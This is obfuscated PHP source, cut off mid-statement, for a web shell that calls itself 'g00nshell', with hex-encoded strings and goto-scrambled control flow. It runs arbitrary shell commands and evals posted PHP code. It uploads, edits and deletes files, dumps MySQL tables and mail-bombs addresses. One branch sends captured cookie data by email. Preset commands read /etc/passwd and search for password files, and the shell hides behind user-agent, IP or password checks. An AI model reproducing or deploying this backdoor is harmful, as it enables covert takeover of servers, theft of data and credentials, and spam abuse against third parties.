"\74\x62\x3e\115\171\x53\x51\114\72\x3c\x2f\x62\76\x20\74\x66\157\x6e\164\40\143\x6f\x6c\x6f\162\75\x27\162\x65\x64\x27\76\117\106\x46\74\x2f\x66\157\x6e\x74\x3e"; } echo "\x3c\57\x64\x69\166\76"; echo "\x5b\40\74\x61\40\150\162\145\x66\75\x27\x23\x68\141\x78\47\x20\x6f\x6e\x43\x6c\x69\x63\x6b\x3d\42\x64\x6f\143\x75\x6d\x65\x6e\x74\x2e\x67\x65\164\105\154\x65\155\x65\x6e\x74\x42\171\111\x64\50\47\x69\156\x66\x6f\47\51\56\163\164\x79\x6c\145\56\144\x69\x73\160\154\141\x79\x20\x3d\40\47\x62\x6c\157\143\x6b\47\x3b\x22\x3e\x4d\157\x72\145\74\57\x61\x3e\x20\135\40"; echo "\133\40\74\x61\x20\x68\162\x65\x66\75\x27\x23\150\x61\170\47\x20\x6f\x6e\x43\x6c\151\143\x6b\75\x22\144\x6f\x63\x75\x6d\145\x6e\164\56\147\x65\x74\105\x6c\145\x6d\x65\156\x74\x42\171\111\144\50\x27\x69\x6e\x66\x6f\x27\51\56\163\164\x79\x6c\x65\x2e\x64\151\163\160\154\x61\x79\40\x3d\x20\47\x6e\157\x6e\x65\47\x3b\42\76\x4c\x65\x73\163\x3c\x2f\x61\x3e\40\135"; echo "\x3c\143\145\x6e\x74\145\162\x3e"; echo "\74\x68\63\x20\x61\x6c\x69\x67\x6e\75\47\x63\x65\x6e\x74\145\162\47\76\114\151\156\x6b\163\74\57\x68\x33\x3e"; if ($_SERVER["\x51\x55\105\122\131\x5f\123\x54\x52\x49\x4e\107"]) { foreach ($act as $link) { echo "\133\x20\x3c\141\x20\150\162\145\x66\x3d\47\x3f" . $_SERVER["\121\125\x45\x52\x59\x5f\123\x54\x52\x49\116\x47"] . "\x26\141\x63\x74\x3d" . $capt[$link] . "\x27\x20\164\x61\162\147\x65\164\75\x27\x66\x72\155\x27\x3e" . $link . "\74\57\141\76\x20\x5d\40"; } } else { foreach ($act as $link) { echo "\133\40\x3c\141\40\150\x72\x65\x66\75\x27\x3f\141\x63\x74\x3d" . $capt[$link] . "\47\40\x74\141\x72\147\145\164\75\47\x66\x72\155\47\76" . $link . "\x3c\x2f\x61\x3e\x20\x5d\x20"; } } echo "\74\x2f\143\x65\x6e\164\145\162\x3e"; echo "\x3c\150\162\x3e"; echo "\74\x62\x72\x3e\74\x69\x66\162\x61\155\145\40\156\x61\x6d\145\x3d\47\x66\x72\155\47\40\x73\x74\x79\154\x65\75\x27\x77\151\x64\x74\150\72\x31\x30\60\x25\x3b\40\150\x65\x69\147\x68\x74\72\66\x35\x25\73\x20\x62\157\162\144\x65\x72\72\60\73\47\40\x73\162\143\75\x27\77\141\x63\164\x3d\x66\x69\154\145\163\x27\76\x3c\57\x69\146\x72\x61\x6d\x65\76"; echo "\x3c\x70\x72\145\40\163\x74\x79\154\x65\75\x27\164\145\170\x74\x2d\141\x6c\x69\x67\x6e\72\x63\x65\x6e\x74\x65\162\x27\x3e\72\72\x20\x67\x30\x30\x6e\163\x68\x65\x6c\x6c\40\74\x66\157\x6e\164\x20\143\x6f\x6c\x6f\162\x3d\x27\x72\145\x64\47\76\166" . $version . "\74\57\x66\157\156\164\76\x20\72\x3a\x3c\x2f\160\162\145\76"; die; } goto iW5_8; u2Hws: $servip = $servinf[0]; goto GCF3q; WLTYy: @set_time_limit(5); goto jMQOw; L8uF6: function email() { $times = $_POST["\164\x69\x6d\x65\163"]; $to = $_POST["\x74\x6f"]; $subject = $_POST["\163\165\142\152\x65\x63\164"]; $body = $_POST["\142\157\x64\171"]; $from = $_POST["\x66\162\x6f\x6d"]; style(); echo "\74\x68\x32\76\x4d\141\x69\x6c\x20\x42\x6f\x6d\x62\145\x72\74\x2f\x68\62\76\12\40\40\74\146\x6f\162\155\40\x6d\x65\164\150\157\x64\x3d\x27\120\117\x53\x54\47\40\141\x63\x74\x69\157\156\x3d\x27\77\x61\143\164\75\145\155\141\151\154\47\76\12\x20\40\x3c\142\x3e\x59\x6f\x75\162\40\141\x64\144\x72\x65\x73\x73\72\x3c\57\x62\x3e\74\x62\162\76\12\40\40\x3c\151\x6e\x70\165\x74\x20\156\141\155\x65\75\x27\146\162\x6f\x6d\47\40\164\171\x70\x65\x3d\x27\x74\145\x78\x74\x27\x20\163\x69\x7a\x65\75\x27\63\65\47\76\74\142\162\x3e\12\40\x20\x3c\x62\76\x54\x68\x65\x69\x72\x20\x61\x64\144\x72\145\163\163\72\74\x2f\x62\76\x3c\142\162\76\xa\40\x20\x3c\x69\x6e\160\165\x74\x20\x6e\141\155\x65\75\x27\164\x6f\47\40\164\x79\160\x65\75\47\x74\x65\x78\x74\47\x20\163\x69\x7a\145\75\x27\63\65\x27\76\x3c\142\162\x3e\12\x20\40\x3c\142\76\123\165\142\x6a\x65\143\164\x3a\x3c\x2f\142\76\74\142\x72\x3e\xa\x20\40\x3c\151\x6e\160\x75\x74\40\156\x61\155\145\75\x27\x73\x75\x62\x6a\x65\x63\164\x27\x20\x74\171\160\x65\75\x27\x74\x65\x78\x74\47\40\x73\151\x7a\x65\75\47\x33\65\x27\x3e\74\142\x72\x3e\12\40\x20\74\x62\x3e\124\145\x78\164\72\x3c\x2f\x62\76\x3c\x62\162\x3e\xa\x20\40\x3c\151\x6e\160\x75\x74\x20\x6e\141\x6d\145\x3d\x27\142\157\144\171\47\x20\164\171\x70\x65\75\47\x74\145\170\164\47\40\163\x69\x7a\145\75\x27\63\65\x27\76\74\x62\x72\76\xa\x20\40\74\142\x3e\110\x6f\x77\40\x6d\x61\x6e\171\x20\164\x69\155\x65\x73\72\x3c\57\x62\76\74\x62\x72\x3e\xa\40\40\74\151\156\160\165\x74\40\x6e\141\155\145\x3d\47\x74\151\x6d\x65\163\47\x20\164\x79\x70\145\75\x27\164\x65\x78\164\47\40\163\151\x7a\145\x3d\x27\x35\x27\76\x3c\142\x72\x3e\74\x62\x72\76\xa\40\40\74\151\x6e\x70\165\x74\x20\x6e\141\x6d\145\75\x27\x73\165\x62\x6d\x69\164\47\40\164\171\160\145\x3d\47\x73\165\142\x6d\x69\x74\47\40\x76\x61\154\x75\145\x3d\x27\x53\165\x62\155\151\164\47\76\12\40\x20\x3c\57\x66\x6f\x72\x6d\76"; if ($to && $from) { for ($i = 0; $i < $times; $i++) { mail("{$to}", "{$subject}", "{$body}", "\x46\x72\x6f\155\x3a\40{$from}"); } } } goto EJ_QD; EfjkW: if ($dir && $dir != "\156\165\154\154\x7a") { $dir = cleandir($dir); } goto J6HYv; Kt_Mr: function userauth() { global $user, $pass; header("\x57\x57\127\55\x41\165\x74\150\145\x6e\164\151\143\x61\164\145\x3a\40\x42\141\163\151\x63\x20\162\x65\141\154\155\75\x27\123\145\x63\165\162\145\40\101\x72\x65\x61\47"); if (md5($_SERVER["\x50\110\120\x5f\x41\125\x54\x48\x5f\125\123\105\x52"]) != $user || md5($_SERVER["\x50\x48\120\x5f\101\125\124\110\137\x50\127"] != $pass)) { hide(); die; } } goto xEa8U; aTjNq: $soft = $_SERVER["\123\105\x52\126\x45\122\x5f\x53\117\x46\124\x57\x41\122\x45"]; goto iHZaI; OwdS2: $cmd = $_GET["\x63\155\144"]; goto DEeX_; I0k_1: $IP = array("\x31\62\x37\56\x30\x2e\x30\56\x32", "\61\62\67\56\x30\56\60\56\x31"); goto ipa7I; D95q_: $cmd = $_GET["\x63\x6d\x64"]; goto ulNOj; cAlhs: $curuser = @exec("\167\150\x6f\x61\x6d\151"); goto D95q_; BamoG: function style() { global $servip, $version; echo "\74\150\x74\155\x6c\76\12\12\40\40\74\x68\145\141\x64\76\12\12\x20\40\x3c\164\151\164\154\145\x3e\147\x30\x30\156\x73\150\x65\154\x6c\x20\x76" . $version . "\x20\x2d\x20" . $servip . "\x3c\57\x74\151\x74\154\x65\x3e\12\12\x20\40\x3c\163\x74\x79\x6c\x65\x3e\xa\12\40\40\142\x6f\x64\x79\40\173\x20\142\141\143\x6b\147\x72\157\165\x6e\144\55\143\x6f\x6c\x6f\x72\x3a\43\x30\x30\60\x30\60\60\x3b\40\143\157\154\x6f\x72\x3a\x77\x68\151\164\x65\x3b\40\146\157\x6e\x74\55\x66\141\155\x69\x6c\171\72\x56\145\x72\x64\141\156\x61\x3b\40\x66\157\x6e\x74\x2d\x73\151\x7a\145\72\x31\x31\x70\x78\73\40\x7d\xa\xa\x20\40\x68\61\40\x7b\x20\x63\157\154\x6f\x72\x3a\x77\x68\151\164\145\x3b\x20\146\x6f\156\164\55\146\x61\x6d\x69\154\171\72\x56\145\x72\x64\141\156\141\73\40\146\157\156\x74\x2d\163\151\x7a\145\x3a\61\x31\x70\x78\x3b\x20\x7d\12\xa\x20\x20\x68\63\x20\x7b\40\143\157\x6c\x6f\162\72\x77\150\x69\x74\x65\73\40\x66\x6f\156\x74\55\x66\141\x6d\151\x6c\171\x3a\x56\x65\162\144\x61\x6e\141\73\40\x66\157\156\164\55\163\151\172\x65\72\x31\61\160\170\73\x20\175\xa\12\40\x20\151\156\160\x75\164\54\164\145\x78\x74\141\x72\x65\141\x2c\163\x65\154\145\x63\x74\40\x7b\40\143\157\x6c\x6f\162\72\43\x46\106\106\x46\106\106\x3b\x20\142\141\143\153\x67\162\157\x75\x6e\x64\x2d\143\157\154\157\162\x3a\43\x32\x46\62\x46\x32\106\x3b\x20\142\x6f\162\x64\145\162\x3a\61\160\x78\x20\163\x6f\154\x69\x64\x20\43\x34\x46\x34\106\64\x46\x3b\40\146\157\x6e\164\x2d\146\141\x6d\151\154\x79\x3a\x56\x65\x72\144\x61\156\141\73\x20\146\157\x6e\164\x2d\163\151\172\145\72\x31\x31\160\x78\x3b\x20\175\xa\12\40\x20\164\x65\x78\164\141\162\145\141\40\173\40\x66\x6f\156\x74\55\x66\141\x6d\x69\x6c\x79\72\103\157\165\x72\151\145\162\x3b\x20\146\157\156\164\55\163\151\x7a\145\72\x31\x31\x70\x78\73\40\175\xa\xa\x20\x20\141\x20\173\x20\143\x6f\x6c\x6f\x72\x3a\x23\x36\x46\x36\x46\x36\106\73\x20\164\145\170\164\55\x64\x65\x63\157\162\x61\x74\x69\x6f\156\72\x6e\x6f\x6e\x65\x3b\x20\x66\157\x6e\x74\x2d\146\x61\155\x69\x6c\x79\72\x56\145\162\x64\x61\156\x61\73\x20\x66\x6f\156\x74\x2d\163\x69\172\x65\72\61\x31\x70\170\73\x20\x7d\12\xa\x20\40\x61\72\x68\157\x76\145\x72\x20\x7b\40\x63\157\x6c\157\162\72\43\67\x46\67\x46\67\106\73\40\175\xa\12\40\40\164\144\54\x74\150\40\x7b\40\146\157\x6e\x74\55\163\x69\x7a\x65\72\61\x32\x70\170\73\40\166\x65\x72\164\151\143\141\154\55\x61\x6c\151\147\x6e\x3a\x6d\151\144\144\x6c\x65\x3b\40\x7d\xa\xa\x20\40\164\150\x20\x7b\x20\x66\157\156\164\55\x73\x69\x7a\145\72\61\x33\160\x78\x3b\40\x7d\12\12\40\40\x74\141\x62\x6c\145\40\173\x20\x65\x6d\160\x74\171\55\x63\145\154\154\163\x3a\x73\x68\157\167\x3b\175\xa\xa\x20\40\x2e\x69\156\x66\x20\x7b\40\x63\157\x6c\157\162\72\x23\67\106\67\106\x37\106\73\40\175\12\xa\40\x20\74\x2f\163\164\171\x6c\x65\76\12\xa\40\40\74\x2f\150\x65\x61\x64\x3e\xa"; } goto rwsQf; iHZaI: $servinf = split("\133\72\x5d", getenv("\110\x54\x54\120\x5f\x48\x4f\x53\x54")); goto u2Hws; FyhAX: if (!$dir) { $dir = $_GET["\x64\x69\162"]; } elseif ($dir && $_SESSION["\144\x69\x72"]) { $dir = $_SESSION["\x64\151\162"]; } elseif ($dir && $_SESSION["\144\151\162"]) { $dir = $curdir; } goto EfjkW; Crq7b: $uakey = "\x62\65\143\63\x64\x30\x62\62\70\x36\x31\71\144\145\x37\60\x62\146\65\65\x38\x38\x35\x30\x35\146\x34\x30\66\x31\146\x32"; goto I0k_1; qub4z: function sqldownload() { @ob_flush; $sqlcon = @mysql_connect($_SESSION["\x73\161\x6c\137\x68\x6f\163\164"] . "\72" . $_SESSION["\x73\161\154\x5f\160\157\162\164"], $_SESSION["\163\x71\154\137\165\163\x65\x72"], $_SESSION["\163\161\154\x5f\x70\x61\x73\x73\167\x6f\x72\x64"]); mysql_select_db($_GET["\144\x62"], $sqlcon); $query = "\123\110\117\x57\40\103\117\x4c\125\115\x4e\x53\40\106\x52\x4f\x4d\40" . $_GET["\164\x61\x62\154\145"]; $result = mysql_query($query, $sqlcon) or die(mysql_error()); $fields = array(); while ($row = mysql_fetch_assoc($result)) { array_push($fields, $row["\106\x69\145\154\144"]); $i++; } $result = mysql_query("\x53\x45\114\x45\x43\124\40\x2a\40\106\122\x4f\115\x20" . $_GET["\164\x61\x62\154\145"], $sqlcon) or die(mysql_error()); $num_rows = mysql_num_rows($result) or die(mysql_error()); for ($x = 1; $x < $num_rows; $x++) { $out .= "\x28"; for ($i = 0; $i < count($fields); $i++) { $out .= "\x27"; $query = "\x53\105\x4c\105\103\x54\x20" . $fields[$i] . "\40\106\122\x4f\x4d\40" . $_GET["\164\x61\142\x6c\x65"] . "\40\x57\x48\105\x52\x45\x20" . $fields[0] . "\40\75\40\47" . $x . "\47"; $dat = mysql_query($query, $sqlcon) or die(mysql_error()); while ($row = mysql_fetch_row($dat)) { if ($row[0] == '') { $row[0] = "\x4e\x55\114\x4c"; } if ($i != count($fields) - 1) { $out .= str_replace("\xd\12", "\134\162\x5c\156", $row[0]) . "\x27\54\x20"; } else { $out .= $row[0] . "\47"; } } } $out .= "\51\x3b\xa"; } $filename = $_GET["\x74\x61\x62\154\x65"] . "\x2d" . time() . "\x2e\163\x71\154"; header("\103\157\x6e\x74\145\x6e\164\x2d\x74\x79\x70\x65\x3a\x20\x61\160\x70\x6c\151\143\x61\x74\151\157\156\57\157\143\x74\x65\x74\55\163\164\x72\145\141\155"); header("\103\157\x6e\164\x65\156\x74\55\x6c\145\x6e\x67\x74\150\72\x20" . strlen($out)); header("\103\x6f\x6e\x74\145\156\164\x2d\x64\151\163\160\x6f\163\151\x74\151\157\x6e\72\40\141\x74\164\141\x63\x68\x6d\145\156\x74\x3b\40\x66\151\154\x65\156\141\155\145\75" . $filename . "\x3b"); echo $out; die; } goto ijVzm; aynIT: function edit($file, $contents) { style(); $handle = fopen($file, "\x77"); fwrite($handle, $contents); fclose($handle); echo "\123\141\x76\145\144\40\146\x69\154\x65\x2e\74\142\162\76\x3c\142\162\76"; echo "\x3c\x61\x20\150\162\145\146\75\x27\77\141\143\164\x3d\x66\x69\154\x65\163\x27\76\x47\157\40\x62\x61\143\x6b\x3c\57\x61\x3e"; } goto ZQbAw; xEa8U: if (!$act && !$cmd && !$cookie && !$f && !$dir && !$gf && !$img) { main(); } elseif (!$act && $cmd) { style(); echo "\74\142\76\122\145\x73\x75\x6c\164\x73\72\x3c\x2f\142\76\12\x3c\142\162\76\x3c\164\145\170\164\x61\x72\145\x61\40\162\157\x77\x73\75\x32\x30\x20\x63\157\154\x73\x3d\61\60\x30\x3e"; $cmd = exec($cmd, $result); foreach ($result as $line) { echo $line . "\xa"; } echo "\74\x2f\x74\x65\x78\164\141\162\145\x61\76"; } elseif ($cookie) { @mail("{$email}", "\103\x6f\157\153\x69\145\x20\x44\x61\164\x61", "{$cookie}", "\106\162\157\x6d\72\x20{$email}"); hide(); } elseif ($act == "\x76\151\x65\167" && $f && $dir) { view($f, $dir); } elseif ($img) { img($img); } elseif ($gf) { grab($gf); } elseif ($dir) { files($dir); } else { switch ($act) { case "\160\150\x70\x69\x6e\x66\157": phpinfo(); break; case "\163\161\154": sql(); break; case "\x66\151\154\x65\163": files($dir); break; case "\x65\155\x61\151\x6c": email(); break; case "\x63\x6d\x64": cmd(); break; case "\x75\160\154\x6f\141\x64": upload(); break; case "\x74\x6f\157\154\163": tools(); break; case "\x73\161\154\x6c\x6f\147\x69\x6e": sqllogin(); break; case "\163\x71\154": sql(); break; case "\x6c\157\157\153\x75\160": lookup(); break; case "\x6b\x69\154\154": kill(); break; case "\x70\150\160\145\170\145\143": execphp(); break; default: main(); break; } } goto GtkJ5; AjxcM: function execphp() { style(); echo "\74\x68\x34\76\105\x78\145\143\165\x74\x65\x20\120\110\120\x20\103\157\x64\145\x3c\x2f\150\64\x3e"; echo "\74\146\x6f\x72\155\40\x6d\145\164\x68\157\144\75\x27\120\x4f\123\x54\x27\x3e"; echo "\74\x74\x65\170\164\x61\x72\x65\141\x20\156\x61\x6d\x65\x3d\47\x70\150\x70\x65\x78\x65\143\x27\x20\x72\x6f\167\163\75\65\x20\x63\157\x6c\163\75\61\60\60\76"; if (!$_POST["\x70\x68\160\x65\170\145\143"]) { echo "\x2f\x2a\104\x6f\x6e\x27\x74\40\x69\156\143\154\x75\x64\145\x20\74\x3f\40\x3f\x3e\x20\164\x61\x67\163\x2a\x2f\xa"; } echo htmlentities($_POST["\160\150\x70\x65\170\x65\x63"]) . "\74\x2f\164\145\x78\x74\141\x72\145\141\x3e\12\x3c\142\162\76\xa"; echo "\74\151\156\x70\x75\x74\40\x74\x79\x70\x65\x3d\x27\163\165\x62\155\x69\x74\x27\x20\166\141\x6c\165\145\75\x27\105\x78\x65\143\x75\164\145\47\76"; echo "\74\x2f\x66\x6f\x72\155\x3e"; if ($_POST["\x70\x68\160\145\170\145\x63"]) { echo "\x3c\x74\x65\x78\x74\141\x72\145\141\40\x72\x6f\167\163\x3d\61\x30\x20\x63\x6f\154\163\x3d\61\x30\60\x3e"; eval(stripslashes($_POST["\x70\150\160\145\170\145\x63"])); echo "\74\x2f\164\x65\170\164\x61\x72\145\141\76"; } } goto ztjju; EJ_QD: function view($filename, $dir) { if ($_POST["\146\x69\154\145\x61\x63\164"] == "\x44\157\167\x6e\x6c\x6f\x61\144") { header("\103\157\x6e\164\x65\156\x74\55\x74\x79\x70\x65\x3a\x20\x61\160\160\154\151\143\x61\x74\151\157\x6e\x2f\157\x63\x74\x65\164\55\x73\164\x72\x65\141\155"); header("\103\x6f\x6e\164\145\x6e\x74\x2d\x6c\x65\x6e\147\164\x68\72\40" . strlen($_POST["\x63\157\156\x74\x65\x6e\164\x73"])); header("\103\x6f\156\164\x65\x6e\164\55\x64\151\163\160\x6f\x73\x69\164\151\157\x6e\72\x20\x61\x74\x74\141\x63\150\x6d\x65\x6e\x74\x3b\x20\146\x69\x6c\x65\x6e\x61\x6d\x65\x3d" . basename($filename) . "\73"); $handle = fopen($filename, "\x72"); echo fread($handle, filesize($filename)); die; } style(); if ($_POST["\x63\157\156\164\145\x6e\x74\x73"] && $_POST["\x66\x69\x6c\x65\x61\x63\164"] == "\x53\141\166\145") { $handle = fopen($filename, "\x77"); fwrite($handle, stripslashes($_POST["\x63\157\156\164\x65\x6e\x74\163"])); fclose($handle); echo "\x53\141\166\x65\144\40\146\151\x6c\145\56\74\x62\x72\x3e\x3c\142\x72\x3e"; echo "\74\141\x20\150\x72\145\x66\x3d\47\77\x61\143\x74\x3d\x76\151\x65\x77\46\x66\x3d{$filename}\46\x64\x69\x72\75\x6e\165\154\154\x7a\x27\x3e\107\157\x20\142\141\x63\x6b\x3c\57\141\76"; die; } elseif ($_POST["\146\151\x6c\145\x61\143\x74"] == "\x44\x65\x6c\x65\x74\x65") { unlink($filename); echo "\104\x65\x6c\145\164\145\x64\x20\x66\151\154\145\x2e\x3c\x62\x72\76\74\x62\x72\76"; echo "\74\x61\x20\x68\162\145\146\75\x27\77\141\x63\164\75\146\x69\x6c\x65\163\47\x3e\107\157\x20\142\141\x63\x6b\74\x2f\141\76"; die; } if ($dir != "\x6e\x75\x6c\x6c\x7a") { $filename = $dir . "\57" . $filename; } $bad = array("\x3c", "\x3e"); $good = array("\74", "\x3e"); $file = fopen($filename, "\x72"); $content = fread($file, @filesize($filename)); echo "\x3c\146\157\162\155\x20\x6e\141\155\x65\75\47\146\151\154\145\x27\40\x6d\145\164\150\x6f\144\75\47\120\117\x53\124\x27\x20\141\x63\x74\151\x6f\x6e\x3d\47\77\x61\x63\164\75\166\151\x65\167\46\x64\151\162\75{$dir}\x26\x66\x3d{$filename}\47\x3e"; echo "\74\164\145\170\164\141\x72\x65\141\40\x73\164\x79\154\145\x3d\47\x77\x69\x64\164\x68\72\x31\60\x30\45\73\40\150\145\151\147\x68\164\x3a\x39\62\45\73\47\40\156\x61\155\145\x3d\47\x63\157\x6e\x74\x65\x6e\x74\163\x27\x3e"; echo str_replace($bad, $good, $content) . "\xa"; echo "\74\57\x74\x65\170\x74\x61\162\x65\141\76"; echo "\x3c\x69\156\x70\165\164\x20\x6e\x61\x6d\x65\75\x27\x66\x69\154\x65\x61\x63\x74\x27\40\164\171\160\145\x3d\47\163\165\x62\x6d\x69\164\x27\40\x76\141\154\x75\145\x3d\47\x53\x61\166\145\x27\76"; echo "\74\151\156\160\x75\x74\40\x6e\141\155\x65\75\x27\146\151\154\x65\141\x63\164\x27\x20\x74\171\x70\145\x3d\x27\163\x75\x62\155\x69\x74\47\x20\166\x61\x6c\165\x65\75\47\x44\145\154\x65\164\x65\47\76"; echo "\x3c\151\x6e\x70\x75\164\40\x6e\141\155\145\75\47\x66\x69\154\x65\141\x63\x74\47\40\x74\171\160\x65\75\x27\163\x75\142\155\151\x74\47\40\x76\141\154\165\145\75\x27\104\157\x77\x6e\154\x6f\141\144\x27\76"; echo "\x3c\57\146\x6f\x72\x6d\x3e"; } goto aynIT; eyRfb: $user = "\141\146\61\60\63\65\x61\x38\x35\x34\x34\x37\146\65\141\x61\71\144\62\x31\65\67\x30\x64\x38\x38\x34\142\67\62\63\x61"; goto YaNTc; mcMx2: $self = $_SERVER["\120\110\120\x5f\x53\x45\x4c\x46"]; goto aTjNq; KufTS: function nicesize($size) { if (!$size) { return false; } if ($size >= 1073741824) { return round($size / 1073741824) . "\x20\107\x42"; } elseif ($size >= 1048576) { return round($size / 1048576) . "\40\x4d\102"; } elseif ($size >= 1024) { return round($size / 1024) . "\x20\x4b\x42"; } else { return $size . "\40\x42"; } } goto LmwYc; GCF3q: $servport = $servinf[1]; goto Re6QC; idNYz: $auth = 0; goto Crq7b; jMQOw: switch ($auth) { case 0: break; case 1: if (md5($_SERVER["\110\124\x54\x50\x5f\x55\x53\105\122\137\x41\x47\x45\x4e\x54"]) != $uakey) { hide(); } break; case 2: if (!in_array($_SERVER["\122\x45\x4d\117\124\x45\137\101\104\104\122"], $IP)) { hide(); } break; case 3: if (!$_SERVER["\x50\110\x50\x5f\101\125\124\110\137\125\123\x45\122"]) { userauth(); } break; } goto Kt_Mr; TNDAO: $img = $_GET["\x69\x6d\147"]; goto ysBF_; zl_Zn: function up($up) { style(); $updir = $_POST["\x6c\x6f\143"]; move_uploaded_file($up["\x74\155\x70\137\x6e\141\155\x65"], $updir . "\x2f" . $up["\156\141\x6d\145"]); die("\106\151\154\x65\x20\150\x61\163\x20\x62\x65\145\x6e\40\165\x70\154\x6f\x61\144\145\144\56"); } goto a_aHJ; DEeX_: $cookie = $_GET["\x63\x6f\157\153\x69\145"]; goto ngrYW; oKKh5: function kill() { style(); echo "\74\x66\157\x72\x6d\x20\x20\155\145\x74\150\x6f\144\75\x27\160\x6f\163\x74\47\76"; echo "\x54\171\x70\145\40\x27\143\x6f\156\x66\151\162\x6d\47\x20\164\x6f\x20\153\151\154\x6c\40\x74\x68\x65\40\x73\x68\x65\x6c\x6c\72\x3c\142\x72\76\12\x3c\151\156\x70\x75\164\x20\164\x79\x70\x65\x3d\47\x74\145\x78\164\47\x20\156\141\155\x65\x3d\x27\x76\x65\162\x27\x20\x61\143\x74\x69\x6f\x6e\75\47\x3f\x61\143\164\x3d\x6b\x69\154\x6c\47\x3e"; echo "\x3c\x69\156\160\x75\x74\x20\x74\x79\160\x65\x3d\47\163\165\142\x6d\151\x74\x27\x20\166\141\154\165\145\75\x27\x44\145\x6c\145\x74\x65\47\76"; echo "\x3c\x2f\x66\x6f\x72\155\x3e"; if ($_POST["\166\145\x72"] == "\143\x6f\156\x66\x69\x72\x6d") { $self = basename($_SERVER["\x50\x48\120\137\123\105\x4c\106"]); if (unlink($self)) { echo "\x44\x65\154\x65\x74\x65\144"; } else { echo "\106\141\x69\x6c\145\x64"; } } } goto d1uen; iW5_8: function cmd() { style(); echo "\x3c\x66\x6f\x72\155\40\x6e\141\155\x65\x3d\x27\103\115\104\47\x20\x6d\145\x74\150\157\x64\x3d\47\x50\117\123\x54\x27\x3e"; echo "\74\x62\x3e\103\x6f\x6d\155\x61\156\x64\x3a\74\57\142\76\74\x62\x72\x3e"; echo "\x3c\x69\x6e\x70\x75\164\40\156\141\155\x65\x3d\x27\143\x6d\144\47\40\164\x79\x70\145\x3d\x27\x74\x65\x78\164\x27\x20\x73\151\172\x65\75\47\x35\x30\x27\x3e\x2a"; echo "\x3c\163\x65\154\x65\x63\164\x20\156\x61\x6d\145\x3d\x27\160\x72\x65\x63\x6d\144\x27\76"; $precmd = array('' => '', "\x52\145\x61\144\40\x2f\145\164\143\57\160\x61\x73\163\x77\144" => "\143\x61\x74\40\x2f\x65\x74\143\x2f\x70\141\163\x73\x77\144", "\x4f\160\145\x6e\40\160\x6f\162\164\x73" => "\156\145\x74\x73\x74\x61\164\x20\55\141\x6e", "\x52\165\x6e\x6e\151\156\147\40\x50\x72\157\143\145\x73\163\x65\x73" => "\160\x73\40\x2d\141\x75\170", "\x55\156\141\155\145" => "\x75\x6e\141\155\x65\40\x2d\x61", "\x47\145\164\40\x55\111\104" => "\x69\x64", "\103\x72\x65\x61\x74\x65\x20\112\165\156\x6b\x66\x69\x6c\145\x20\x28\x2f\x74\x6d\160\x2f\172\51" => "\144\144\40\151\x66\75\57\144\x65\x76\x2f\x7a\x65\x72\x6f\40\157\x66\75\x2f\x74\155\160\x2f\172\x20\x62\163\x3d\61\115\x20\143\157\165\x6e\x74\x3d\x31\60\62\64", "\x46\151\x6e\144\x20\160\x61\163\163\x77\144\x20\146\151\154\145\163" => "\x66\x69\x6e\x64\x20\57\x20\55\x74\x79\x70\x65\x20\146\x20\x2d\x6e\141\x6d\145\x20\x70\141\x73\163\167\x64"); $capt = array_flip($precmd); foreach ($precmd as $c) { echo "\x3c\157\160\164\151\x6f\156\40\x76\x61\154\x75\x65\x3d\47" . $c . "\x27\76" . $capt[$c] . "\xa"; } echo "\x3c\57\x73\145\154\x65\x63\x74\76\x3c\142\162\x3e\12"; echo "\x3c\151\156\160\x75\164\x20\164\x79\x70\145\x3d\x27\163\165\142\155\151\x74\47\x20\166\x61\154\165\x65\75\47\105\170\x65\143\165\x74\145\x27\76\12"; echo "\x3c\57\146\157\x72\155\76\12"; if ($_POST["\143\155\x64"] != '') { $x = $_POST["\143\x6d\x64"]; } elseif ($_POST["\x70\x72\145\x63\155\x64"] != '') { $x = $_POST["\160\162\145\143\155\x64"]; } else { die; } echo "\122\145\x73\x75\154\x74\163\x3a\x20\74\x62\162\76\x3c\x74\x65\x78\x74\x61\x72\145\141\x20\x72\x6f\167\x73\x3d\x32\60\40\143\x6f\x6c\163\x3d\x31\60\x30\76"; $cmd = @exec($x, $result); foreach ($result as $line) { echo $line . "\xa"; } echo "\x3c\x2f\164\x65\x78\x74\x61\162\145\141\76"; } goto AjxcM; GtkJ5: function cleandir($d) { $d = realpath($d); $d = str_replace("\x5c\134", "\x2f\x2f", $d); $d = str_replace("\57\57\57\x2f", "\57\x2f", $d); $d = str_replace("\x5c", "\x2f", $d); return $d; } goto ZJa2z; ZQbAw: function upload() { global $curdir; style(); echo "\74\146\x6f\162\155\40\156\x61\x6d\x65\75\x27\146\151\154\x65\x73\x27\x20\x65\x6e\143\164\x79\160\145\75\47\155\x75\154\164\x69\x70\x61\162\164\57\x66\157\x72\155\x2d\x64\141\x74\141\x27\x20\x6d\x65\x74\150\157\144\x3d\x27\120\117\123\124\x27\76\12\x20\40\x3c\142\76\x4f\165\164\160\x75\164\x20\x44\151\x72\x65\143\x74\157\x72\171\74\57\142\x3e\x3c\142\x72\x3e\12\x20\x20\74\151\x6e\x70\165\x74\40\164\171\x70\x65\x3d\47\164\x65\x78\164\47\x20\156\141\155\145\75\x27\154\x6f\x63\47\40\163\x69\x7a\x65\75\47\66\x35\47\40\x76\x61\154\165\x65\x3d\47" . $curdir . "\47\x3e\x3c\x62\162\76\74\142\x72\76\12\40\x20\74\142\x3e\x52\145\155\x6f\164\x65\x20\x55\x70\x6c\x6f\141\x64\x3c\57\x62\76\74\142\x72\x3e\12\40\x20\x3c\x69\x6e\x70\x75\x74\x20\x74\x79\x70\145\75\x27\x74\x65\170\164\x27\40\x6e\141\155\x65\x3d\47\162\x65\x6d\x27\40\x73\x69\x7a\x65\x3d\47\66\65\x27\x3e\xa\40\x20\74\x69\156\x70\165\164\x20\x74\x79\x70\x65\75\47\x73\x75\x62\155\151\164\x27\40\x76\141\154\x75\145\x3d\x27\107\x72\141\x62\47\x3e\x3c\x62\162\76\x3c\142\x72\76\12\40\40\x3c\x62\x3e\114\x6f\143\x61\x6c\x20\x46\x69\x6c\145\40\x55\160\x6c\x6f\141\144\x3c\x2f\x62\x3e\74\x62\162\x3e\xa\40\40\74\x69\x6e\x70\165\x74\x20\x6e\x61\x6d\145\x3d\47\x75\160\47\40\164\x79\160\x65\75\x27\x66\151\154\x65\x27\40\x73\151\172\145\x3d\x27\66\65\47\x3e\12\x20\40\74\x69\x6e\x70\165\x74\40\164\x79\x70\x65\x3d\x27\163\x75\x62\155\151\164\47\x20\166\141\x6c\x75\x65\75\47\125\160\154\x6f\141\144\47\x3e\12\40\x20\x3c\x2f\x66\157\162\x6d\76\74\142\x72\x3e"; if ($_POST["\x72\x65\x6d"]) { 